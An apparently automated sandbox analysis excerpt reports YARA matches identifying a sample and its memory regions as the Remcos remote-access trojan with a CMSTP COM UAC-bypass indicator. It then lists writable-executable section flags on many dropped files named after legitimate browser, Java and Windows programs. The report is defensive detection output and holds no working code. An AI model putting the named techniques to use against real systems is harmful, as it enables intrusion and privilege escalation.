              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.name.exe.3d80000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 1.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.name.exe.39b0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000012.00000002.1962839216.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000016.00000002.1958069943.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: name.exe PID: 4420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: name.exe PID: 2084, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: name.exe PID: 6908, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: default-browser-agent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.132_chrome_installer.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info_x64.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: notification_click_helper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pwahelper.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe0.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 7z.exe.6.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
